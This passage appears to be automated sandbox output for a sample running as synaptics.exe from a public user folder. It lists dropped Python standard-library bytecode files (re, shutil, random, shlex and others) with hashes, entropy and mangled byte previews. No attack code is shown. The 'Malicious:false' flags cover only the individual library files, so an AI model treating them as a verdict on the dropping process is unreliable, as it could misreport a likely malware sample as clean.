                                                                                                                                                                                                                                  Preview:o........'-dV........................@...s....d.Z.g.d...Z.d.Z.d.Z.d.Z.d.Z.z.d.d.l.m.Z.m.Z...W.n...e.y%......d.Z.d.Z.Y.n.w.d.d...Z.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.e.d.k.rWe.....d.S.d.S.).zHConversions to/from quoted-printable transport encoding as per RFC 1521.)...encode..decode..encodestring..decodestring.....=.L...s....0123456789ABCDEF..........)...a2b_qp..b2a_qpNc....................C...sH...t.|.t...s.J...|.d.v.r.|.S.|.d.k.r.|.S.|.t.k.p#d.|.....k.o d.k.n.......S.).z.Decide whether a particular byte ordinal needs to be quoted... The 'quotetabs' flag indicates whether embedded tabs and spaces should be. quoted. Note that line-ending tabs and spaces are always encoded, as per. RFC 1521.. ..... ......_..... .....~)...isinstance..bytes..ESCAPE)...c..quotetabs..header..r.....(C:\Users\Public\M20EKMMEH2\lib\quopri.py..needsquoting....s..............".r....c....................C...sB...t.|.t...r.t.|...d.k.s.J...t.|...}.t.t.t.|.d.....t.|.d.
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):22759
                                                                                                                                                                                                                                  Entropy (8bit):5.437994150188222
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:g151Eqqa1lrwieniMSkFVjhfFKoTWGtCX2v1b2+/ngCbWQhkcqHVG:gzJ5KniKTZCX25/1bWbcaVG
                                                                                                                                                                                                                                  MD5:7867C49BB73D059F533ED6FF4084D576
                                                                                                                                                                                                                                  SHA1:217DFD51BE39CBF67F09575A11B4B7B88A1E90BF
                                                                                                                                                                                                                                  SHA-256:482F0CEFC2795CCF8E2670508CFEF86222BBE380A708810B5157B13959E58B21
                                                                                                                                                                                                                                  SHA-512:CCAD5BD8D41ED09E5ABE9B28D033B8B76CE02A516E119CF52063617E86267DF04E4EC906F5C70FF3324A3098B588C88016DA13795194608B0263D2EB3219C829
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-dg........................@...s....d.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l m!Z"m#Z$..d.d.l%m&Z'..d.d.l(m)Z*m+Z,..d.d.l-m-Z...d.d.l.Z/d.d.l0Z0z.d.d.l1m2Z1..W.n...e3ym......d.d.l4m2Z1..Y.n.w.g.d...Z5d.e.d.....e.d.....Z6e.d...Z7d.e.d.....Z8d.Z9d.e9....Z:d.Z;G.d.d...d.e0j<..Z<G.d.d...d.e<..Z=e<..Z>e>j?Z?e>j@Z@e>jAZAe>jBZBe>jCZCe>jDZDe>jEZEe>jFZFe>jGZGe>jHZHe>jIZIe>jJZJe>jKZKe>jLZLe>jMZMe>jNZNe>jOZOe>jPZPe>jQZQe>jRZRe>jSZSe>jTZTe>jUZUd.d...ZVd#d.d...ZWeXe/d ..r.e/jYe>j?d!....eZd"k...r.eW....d.S.d.S.)$a....Random variable generators... bytes. -----. uniform bytes (values between 0 and 255).. integers. --------. uniform within range.. sequences. ---------. pick random element. pick random sample. pick weighted random sample. generate random permutation.. distributions on the real line:. ------------------------------. unifor
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):14238
                                                                                                                                                                                                                                  Entropy (8bit):5.213158083593749
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:EuPJsiNrHyol2OkRFvMKUryx95qoxSrMbZ:ECJssrSokfRAry/5qoUrMbZ
                                                                                                                                                                                                                                  MD5:5B7DDE5A1BAB1970652913E316A471A7
                                                                                                                                                                                                                                  SHA1:4735362D59DC5E72A7FAC0307EA5337D0961778A
                                                                                                                                                                                                                                  SHA-256:FD28180D46DD929E4AB0AA32B771E56CAA5642B13C758B1D437C4BA90A20F319
                                                                                                                                                                                                                                  SHA-512:A57E6D9F1EA322DEFBA1A0DBFF831B3DB3450C315E7553273FDB587E51146CEB8E35C5D7AFA52CA6B067B476C470D72E0CC491D954A5C4327B3A0BE4ACDDB312
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-ds?.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.z.d.d.l.Z.W.n...e.y#......d.Z.Y.n.w.g.d...Z.d.Z.G.d.d...d.e.j...Z.e.....e.j.....e.j.Z.d0d.d...Z.d0d.d...Z.d0d.d...Z.d1d.d...Z.d1d.d...Z.d1d.d...Z.d0d.d...Z.d0d.d...Z.d0d.d...Z.d.d...Z.d0d.d...Z.d.d...d.D...Z.d d!..Z.e.e...d"d.....Z.e.e...d"d.....d"....Z.i.Z.d#Z d$d%..Z!e.."e ..d&d'....Z#d(d)..Z$d*d+..Z%d.d.l&Z&d,d-..Z'e&.(e.e'e!....G.d.d/..d/..Z)d.S.)2a....Support for regular expressions (RE)...This module provides regular expression matching operations similar to.those found in Perl. It supports both 8-bit and Unicode strings; both.the pattern and the strings being processed can contain null bytes and.characters outside the US ASCII range...Regular expressions can contain both special and ordinary characters..Most ordinary characters, like "A", "a", or "0", are the simplest.regular expressions; they simply match themselves. You can.concatenate ordinary characters, so last matches the string 'last'...Th
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5261
                                                                                                                                                                                                                                  Entropy (8bit):5.029386099613286
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:rdnTWdW+/lUgN2VsfA2IywpvIyeyiGtJAlKgN0A7Hb:dQDk52elTicNWN
                                                                                                                                                                                                                                  MD5:364C7D3B75553FA21BDDD6970F4924A5
                                                                                                                                                                                                                                  SHA1:FD4A9207A7B8B6282D799E0C752440F4BAF07CC5
                                                                                                                                                                                                                                  SHA-256:43A0233BB63AA09C56103D4325FF290A97961EFF10750A1B0973C26F0BD9EC3E
                                                                                                                                                                                                                                  SHA-512:8B915F36213CEEBB2C0BB44FB3F84F60B53F72F98428267FD930209AEE2D934AD840109CE4CE13C56D8F5AC49834DD4C81F0720450CB2B11717018DD897C21B2
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d4........................@...s\...d.Z.g.d...Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.d...Z.G.d.d...d...Z.d.d...Z.e...Z.e.j.Z.d.S.).zGRedo the builtin repr() (representation) but with limits on most sizes.)...Repr..repr..recursive_repr.....N)...islice)...get_ident.....c........................s......f.d.d...}.|.S.).zGDecorator to make a repr function return fillvalue for a recursive callc........................sX...t...........f.d.d...}.t...d...|._.t...d...|._.t...d...|._.t...d...|._.t...d.i...|._.|.S.).Nc........................sJ...t.|...t...f.}.|...v.r...S.....|.....z...|...}.W.....|.....|.S.....|.....w...N)...idr......add..discard)...self..key..result)...fillvalue..repr_running..user_function...)C:\Users\Public\M20EKMMEH2\lib\reprlib.py..wrapper....s......................z<recursive_repr.<locals>.decorating_function.<locals>.wrapper..__module__..__doc__..__name__..__qualname__..__annotations__)...set..getattrr....r....r....r....r....).r....r......r....).r....r....r......de
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):17116
                                                                                                                                                                                                                                  Entropy (8bit):5.182023941981992
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:6jM7Dm/9rSzUEok/L1xzQ8DdIE67SQSUQGJbvRkE4wSvceC:6jM7Dm/9rSzzBdIn7SQSkbvRkE4FvceC
                                                                                                                                                                                                                                  MD5:882BC52C1C4E018CA9D9D10D2100F4D7
                                                                                                                                                                                                                                  SHA1:B464A52149E7F12E52ACEA9C976F983FCD232E9D
                                                                                                                                                                                                                                  SHA-256:687AD91A18A3FECDD5E687FAA47DA7423B74C33FA09A910AC760A5E7F2CB2B50
                                                                                                                                                                                                                                  SHA-512:1A0AADDFB83109C9DBE24302B74FD29206AA5A459491EEEF5DBA7994C0F8751A76B026A999BD1B2EA93B76C69548CC0A3802344A200BFFB3DA82DE78B9DE073E
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.N.......................@...s....d.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.Z.d.Z.d.d...Z.e.d.g.d.....Z.d.e._.e.j.d.k.rId.e.j._.d.e.j._.d.e.j._.d.e.j._.G.d.d...d.e...Z.G.d.d...d.e.d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.e.e.d...r.G.d.d...d.e...Z.e.e.d ..r.G.d!d"..d"e...Z.e.e.d#..r.G.d$d%..d%e...Z.e.e.d&..r.G.d'd(..d(e...Z.d)d*..Z.e.d&..r.e.Z.d.S.e.d ..r.e.Z.d.S.e.d#..r.e.Z.d.S.e.d...r.e.Z.d.S.e.Z.d.S.)+z|Selectors module...This module allows high-level and efficient I/O multiplexing, built upon the.`select` module primitives.......)...ABCMeta..abstractmethod)...namedtuple)...MappingN..........c....................C...s`...t.|.t...r.|.}.n.z.t.|.......}.W.n...t.t.t.f.y"......t.d...|.....d...w.|.d.k.r.t.d...|.......|.S.).z.Return a file descriptor from a file object... Parameters:. fileobj -- file object or file descriptor.. Returns:. corresponding file descriptor.. Raises:. ValueError if the object is invalid. z.I
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                  Size (bytes):7793
                                                                                                                                                                                                                                  Entropy (8bit):5.51418321289583
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:dQrdt23n71QxhSaL09FKXY5nzg9gn1yiEWE5cnPr+vP:Krsxb9FKo5zg9g1yLZ6PQ
                                                                                                                                                                                                                                  MD5:C6DD94A869A115C679CA914DB621E0E7
                                                                                                                                                                                                                                  SHA1:DF1F4BEE8B11744487A1083881140F26B5E6CB9F
                                                                                                                                                                                                                                  SHA-256:55756CAB04E3EEBEA0A7012A42ADB8E821629E1E3C0E624EFC26E32AC7B5ECF4
                                                                                                                                                                                                                                  SHA-512:58568EA1DD20C83627DA0A1EA6877D2CB8FC4BEE68A1588C2DFE117408C87934F84523FF648F253320A10176E443724874896344926151B7FCD340431E52EA00
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.6.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...g.d...Z.G.d.d...d...Z.d.d.d...Z.d.d...Z.e...d.e.j...j.Z.d.d...Z.d.d...Z.e.d.k.rse.e.j...d.k.rPe.e.......d.S.e.j.d...Z.e.e.....Z.e.e.e.e.......W.d.........d.S.1.slw.......Y...d.S.d.S.)..8A lexical analyzer class for simple shell-like syntaxes......N)...deque)...StringIO)...shlex..split..quote..joinc....................@...sv...e.Z.d.Z.d.Z.....d.d.d...Z.e.d.d.....Z.d.d...Z.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d.d...Z.d.d...Z.d.d...Z.d.S.).r....r....NFc....................C...s....t.|.t...r.t.|...}.|.d.u.r.|.|._.|.|._.n.t.j.|._.d.|._.|.|._.|.r$d.|._.n.d.|._.d.|._.d.|._.|.j.r7|...j.d.7..._.d.|._.d.|._.d.|._.d.|._.d.|._.d.|._.t...|._.d.|._.d.|._.d.|._.t...|._.d.|._.|.sbd.}.n.|.d.u.rhd.}.|.|._.|.r.t...|._.|...j.d.7..._.|.j...t...|.....}.|.j...|...|._.d.S.d.S.).N....#Z?abcdfeghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_u|..............................
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):7793
                                                                                                                                                                                                                                  Entropy (8bit):5.51418321289583
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:dQrdt23n71QxhSaL09FKXY5nzg9gn1yiEWE5cnPr+vP:Krsxb9FKo5zg9g1yLZ6PQ
                                                                                                                                                                                                                                  MD5:C6DD94A869A115C679CA914DB621E0E7
                                                                                                                                                                                                                                  SHA1:DF1F4BEE8B11744487A1083881140F26B5E6CB9F
                                                                                                                                                                                                                                  SHA-256:55756CAB04E3EEBEA0A7012A42ADB8E821629E1E3C0E624EFC26E32AC7B5ECF4
                                                                                                                                                                                                                                  SHA-512:58568EA1DD20C83627DA0A1EA6877D2CB8FC4BEE68A1588C2DFE117408C87934F84523FF648F253320A10176E443724874896344926151B7FCD340431E52EA00
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.6.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...g.d...Z.G.d.d...d...Z.d.d.d...Z.d.d...Z.e...d.e.j...j.Z.d.d...Z.d.d...Z.e.d.k.rse.e.j...d.k.rPe.e.......d.S.e.j.d...Z.e.e.....Z.e.e.e.e.......W.d.........d.S.1.slw.......Y...d.S.d.S.)..8A lexical analyzer class for simple shell-like syntaxes......N)...deque)...StringIO)...shlex..split..quote..joinc....................@...sv...e.Z.d.Z.d.Z.....d.d.d...Z.e.d.d.....Z.d.d...Z.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d.d...Z.d.d...Z.d.d...Z.d.S.).r....r....NFc....................C...s....t.|.t...r.t.|...}.|.d.u.r.|.|._.|.|._.n.t.j.|._.d.|._.|.|._.|.r$d.|._.n.d.|._.d.|._.d.|._.|.j.r7|...j.d.7..._.d.|._.d.|._.d.|._.d.|._.d.|._.d.|._.t...|._.d.|._.d.|._.d.|._.t...|._.d.|._.|.sbd.}.n.|.d.u.rhd.}.|.|._.|.r.t...|._.|...j.d.7..._.|.j...t...|.....}.|.j...|...|._.d.S.d.S.).N....#Z?abcdfeghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_u|..............................
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):38372
                                                                                                                                                                                                                                  Entropy (8bit):5.5300430985918005
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:C6QXEThEID61k7Ai7h3M/cjAgTPgtyQZuYTqGMjQ0olo4txZ:C6QXEGIeL+rTPgtyQZuYTqGMjQno4tz
                                                                                                                                                                                                                                  MD5:226C27A5F1712A5CE93FAA3F1F44813F
                                                                                                                                                                                                                                  SHA1:BA6008D8D248C7E12F4B14D93C008048FC474E58
                                                                                                                                                                                                                                  SHA-256:81D5A4524D1CC33AE8393569934DD5B14855B8BD2AC74A2F51EDE891613B0550
                                                                                                                                                                                                                                  SHA-512:EE32F606634457437B0B5B4A2E84D32C641D2862807E998C3A174FFC6CEC432591CD695FBF0E778B23F239398E6DDEECBB81240C0807A7DC4DD336E59E67CBD5
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...s"...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.z.d.d.l.Z.[.d.Z.W.n...e.y.......d.Z.Y.n.w.z.d.d.l.Z.[.d.Z.W.n...e.yC......d.Z.Y.n.w.z.d.d.l.Z.[.d.Z.W.n...e.yX......d.Z.Y.n.w.e.j.d.k.Z.d...Z.Z.e.j.d.k.rld.d.l.Z.n.e.rrd.d.l.Z.e.rvd.n.d.Z.e.e.d...o.e.j...d...a.e.o.e.e.d...Z.d.Z.g.d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e ..Z!G.d.d...d.e ..Z"d.d...Z#d.d...Z$e.f.d d!..Z%d.d"d#..Z&d$d%..Z'd&d'..Z(d(d)..Z)d.d*..d+d,..Z*d.d*..d-d...Z+e.e.d/....r.d.d*..d0d1..Z,n.d2d1..Z,d.d*..d3d4..Z-d.d*..d5d6..Z.d.d*..d7d8..Z/d9d:..Z0..d.d;d<..Z1d.d.e/d.d.f.d=d>..Z2e.e.j3d?....r@d@dA..Z4dBdC..Z5n.dDdA..Z4dEdC..Z5dFdG..Z6dHdI..Z7e.j8e.j.e.j9e.j:h.e.j;k...oje.j<e.j=v...oje.j.e.j>v.Z?d.dJdK..Z@e?e@_AdLdM..ZBe/f.dNdO..ZCdPdQ..ZDdRdS..ZEdTdU..ZFdVdW..ZG....d.dYdZ..ZH....d.d[d\..ZId]eHd^g.d_d.f.i.ZJe...r.eHd`g.dad.f.eJdb<.eIg.dcd.f.eJdd<.e...r.eHdeg.dfd.f.eJdg<.e...r.eHdhg.did.f.eJdj<.dkdl..ZKd.dndo..ZLdpdq..ZM
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):38372
                                                                                                                                                                                                                                  Entropy (8bit):5.5300430985918005
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:C6QXEThEID61k7Ai7h3M/cjAgTPgtyQZuYTqGMjQ0olo4txZ:C6QXEGIeL+rTPgtyQZuYTqGMjQno4tz
                                                                                                                                                                                                                                  MD5:226C27A5F1712A5CE93FAA3F1F44813F
                                                                                                                                                                                                                                  SHA1:BA6008D8D248C7E12F4B14D93C008048FC474E58
                                                                                                                                                                                                                                  SHA-256:81D5A4524D1CC33AE8393569934DD5B14855B8BD2AC74A2F51EDE891613B0550
                                                                                                                                                                                                                                  SHA-512:EE32F606634457437B0B5B4A2E84D32C641D2862807E998C3A174FFC6CEC432591CD695FBF0E778B23F239398E6DDEECBB81240C0807A7DC4DD336E59E67CBD5
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...s"...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.z.d.d.l.Z.[.d.Z.W.n...e.y.......d.Z.Y.n.w.z.d.d.l.Z.[.d.Z.W.n...e.yC......d.Z.Y.n.w.z.d.d.l.Z.[.d.Z.W.n...e.yX......d.Z.Y.n.w.e.j.d.k.Z.d...Z.Z.e.j.d.k.rld.d.l.Z.n.e.rrd.d.l.Z.e.rvd.n.d.Z.e.e.d...o.e.j...d...a.e.o.e.e.d...Z.d.Z.g.d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e ..Z!G.d.d...d.e ..Z"d.d...Z#d.d...Z$e.f.d d!..Z%d.d"d#..Z&d$d%..Z'd&d'..Z(d(d)..Z)d.d*..d+d,..Z*d.d*..d-d...Z+e.e.d/....r.d.d*..d0d1..Z,n.d2d1..Z,d.d*..d3d4..Z-d.d*..d5d6..Z.d.d*..d7d8..Z/d9d:..Z0..d.d;d<..Z1d.d.e/d.d.f.d=d>..Z2e.e.j3d?....r@d@dA..Z4dBdC..Z5n.dDdA..Z4dEdC..Z5dFdG..Z6dHdI..Z7e.j8e.j.e.j9e.j:h.e.j;k...oje.j<e.j=v...oje.j.e.j>v.Z?d.dJdK..Z@e?e@_AdLdM..ZBe/f.dNdO..ZCdPdQ..ZDdRdS..ZEdTdU..ZFdVdW..ZG....d.dYdZ..ZH....d.d[d\..ZId]eHd^g.d_d.f.i.ZJe...r.eHd`g.dad.f.eJdb<.eIg.dcd.f.eJdd<.e...r.eHdeg.dfd.f.eJdg<.e...r.eHdhg.did.f.eJdj<.dkdl..ZKd.dndo..ZLdpdq..ZM
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):17391
                                                                                                                                                                                                                                  Entropy (8bit):5.5115150291836565
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:0lp4Tn42l1QP47TUN1PirJtKA5y15/Jgt1nmKQ1ruVhY2lrD9bIhx/xAUu2n8/X1:pL42lug7TA1Pi9cA015hgt1nmlUvvlrx
                                                                                                                                                                                                                                  MD5:B9489157B9AB2A3CC89CF592B4AC7A1D
                                                                                                                                                                                                                                  SHA1:FB660BD08202BF9F78FCE3B6B69AA52E36E9EF38
                                                                                                                                                                                                                                  SHA-256:C2435B769F5AAAEA364EDCB0BCE7CAF362CD197A46B7F897AD9784DA961F3B2C
                                                                                                                                                                                                                                  SHA-512:13BD7BFA54B199BED9E24A283B83568D860EA0DF14DE9A28F32A16C80D901F0A0DAD212A514B760571799BAE18DFD23D6C5A68EE24F93A8D969324CCD49DE4DA
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.Z.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.e.j.e.j.g.a.d.a.d.a.d.a.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d4d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d4d.d...Z.d4d.d ..Z.d!d"..Z.d#d$..Z.d%d&..Z.d'd(..Z.d)d*..Z.d+d,..Z d-d...Z!d/d0..Z"e.j#j$s.e"....d1d2..Z%e&d3k.r.e%....d.S.d.S.)5a....Append module search paths for third-party packages to sys.path...****************************************************************.* This module is automatically imported during initialization. *.****************************************************************..This will append site-specific paths to the module search path. On.Unix (including Mac OSX), it starts with sys.prefix and.sys.exec_prefix (if different) and appends.lib/python<version>/site-packages..On other platforms (such as Windows), it tries each of the.prefixes directly, as well as with lib/site-packages appended. The.resulting directories, if they exist, are appended to
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):28974
                                                                                                                                                                                                                                  Entropy (8bit):5.536834582969358
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:Ptwx/9l/P/Xkf1dTtaMTCmWwflMCMGYIeM044ZNOLe3:POxFpQbFCtmlXYIeM05nOy3
                                                                                                                                                                                                                                  MD5:680137EA6E53F2FB195CA45F26656721
                                                                                                                                                                                                                                  SHA1:27C04D5EEE754EDE14A19107482D62785BF59EED
                                                                                                                                                                                                                                  SHA-256:F97067FBB44DBE56F9140A7D91AA7035676CD1EC7752E1EF486FC85E0ECD9541
                                                                                                                                                                                                                                  SHA-512:679B33B0A40C46F91E5454C19B6FFEC7C48D688D9621DA03D1115BBA8EDBD6BE170EE591070215154443081B08DD629E4C82A71D7D3F4410D25FA9478540530B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-dq........................@...sT...d.Z.d.d.l.Z.d.d.l.T.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...z.d.d.l.Z.W.n...e.y3......d.Z.Y.n.w.e.e.d.d...Z.e.e.d.d...Z.e.e.d.d...Z.g.d...Z.e...e...e.......e...d.e.d.d.......e...d.e.d.d.......e...d.e.d.d.......e...d.e.d.d.......d.Z.d.Z.d.d...Z.e.j.......d.....r.i.Z.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d <.d!e.d"<.d#e.d$<.d%e.d&<.d'e.d(<.d)e.d*<.d+e.d,<.d-e.d.<.d/e.d0<.d1e.d2<.d3e.d4<.d5e.d6<.d7e.d8<.d9e.d:<.d;e.d<<.d=e.d><.d?e.d@<.dAe.dB<.dCe.dD<.dEe.dF<.dGe.dH<.dIe.dJ<.dKe.dL<.dMe.dN<.dOe.dP<.dQe.dR<.dSe.dT<.dUe.dV<.dWe.dX<.dYe.dZ<.d[e.d\<.d]e.d^<.d_e.d`<.dae.db<.dce.dd<.dee.df<.dge.dh<.die.dj<.dke.dl<.dme.dn<.doe.dp<.dqe.dr<.dse.dt<.due.dv<.dwe.dx<.dye.dz<.d{e.d|<.d}e.d~<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):15205
                                                                                                                                                                                                                                  Entropy (8bit):5.608845979983705
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:Mrz34fmVm0PVclj2zdkbUzI0MXwcXBzE8yQwo39V753Mqud6LnT:MrnV8j8KAzh2G8pwoNv3Mr6LnT
                                                                                                                                                                                                                                  MD5:E33AC9A596856562715B65268E76D8CE
                                                                                                                                                                                                                                  SHA1:297F8B2B6828C72FE98710D5E73556AA0CBBBD82
                                                                                                                                                                                                                                  SHA-256:B1A7B3284EF4E056520AF0E2B4F8BD2353D2F41CD96E692E57D754255109E6CF
                                                                                                                                                                                                                                  SHA-512:FB30C4792AC231523310DF14031C1061A9D3456BA9E35CD2DA3335D8D6024608C76F9BBF0CFFC93738C883F21AC1EAF6A8F7700BE917E5E296BA83B380AF8079
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-dmp.......................@...s$...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.T.e.j.e.k.s.J.d.....e.e.h.Z.e.e.e.h.Z.e.e.h.Z.e.e.h.Z.e.e.e.h.B.Z.d.Z.d.d...e.D...Z.e.j.f.d.d...Z.d.d...Z.d.d...Z.d-d.d...Z.e.j.d...Z.d.e.>.d...Z.d.Z.e.e f.d.d...Z!d.d...Z"d.d...Z#d.d...Z$d.d...Z%d.d...Z&d.d ..Z'd!d"..Z(d#d$..Z)d%d&..Z*d'd(..Z+d)d*..Z,d.d+d,..Z-d.S.)/z.Internal support module for sre.....N)...*z.SRE module mismatch).)..i...i1...)..s...i....).....i....).iE...i....i....).i....i....).i....i....).i....i....).i....i....).i....i....).i....i....).i....i....).i....i....).i....i....).i....i....).i2...i....).i4...i....).i>...i....).iA...i....).iB...i....i....).iJ...i....).ic...i....).i....iK...).ia...i....).i....i....c........................s....i.|.].}.|.D.].....t...f.d.d...|.D.......q.q.S.).c....................3...s......|.].}...|.k.r.|.V...q.d.S...N..)....0..j....ir.....-C:\Users\Public\M20EKMMEH2\lib\sre_compile.py..<genexpr>N...s........z.<dictcomp>.<genexpr>)...tuple).r......tr....r....r......<dictc
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):6368
                                                                                                                                                                                                                                  Entropy (8bit):5.77679866747433
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:u7jrG4iQ2AaI2Ym9gqQBI1I1dadE1ff7l17mwvYhaSEZ84C:uM9rIdNfT6E8
                                                                                                                                                                                                                                  MD5:4E0881E0E0DD14C044C0A32C840CE50A
                                                                                                                                                                                                                                  SHA1:E5B867F969E32844916D1A5F77A699EB8B582631
                                                                                                                                                                                                                                  SHA-256:81A201BDC77C1BD5A9673DE9B7044BF9E64D829FA38C0152D93521BD99AC5864
                                                                                                                                                                                                                                  SHA-512:F819DEAD9DD493BDAE32A2FAB1F9D05912246B20F88F12DBC5A8432B584FE3398ACA8ADEB48875A2AC790271DC27EC04DCE7B41A52AAC10585D019F1B3CB80CA
                                                                                                                                                                                                                                  Malicious:false
